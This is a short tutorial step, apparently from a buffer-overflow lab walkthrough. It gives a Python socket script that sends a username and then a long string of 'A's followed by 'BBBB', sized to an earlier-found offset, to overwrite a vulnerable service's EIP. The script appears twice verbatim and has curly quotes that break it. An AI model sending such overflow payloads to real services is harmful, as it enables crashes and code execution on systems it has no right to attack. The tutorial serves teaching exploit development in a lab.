Overwriting the EIP
Edit the script.py with offset location find in last step and add BBBB and run it again
🐍
import socket, sys
username = "test"
message =
“A” * <offset location> + “B” * 4
try:
print("Sending payload...")
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv(1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()
username = "test"
message =
“A” * <offset location> + “B” * 4
try:
print("Sending payload...")
s=socket.socket (socket.AF_INET,socket.SOCK_STREAM)
s.connect(('<ip>',<port>))
s.recv(1024)
s.send(username + '\r\n')
s.recv(1024)
s.send(message + '\r\n')
s.recv(1024)
s.close()
except:
print("Cannot connect to the server")
sys.exit()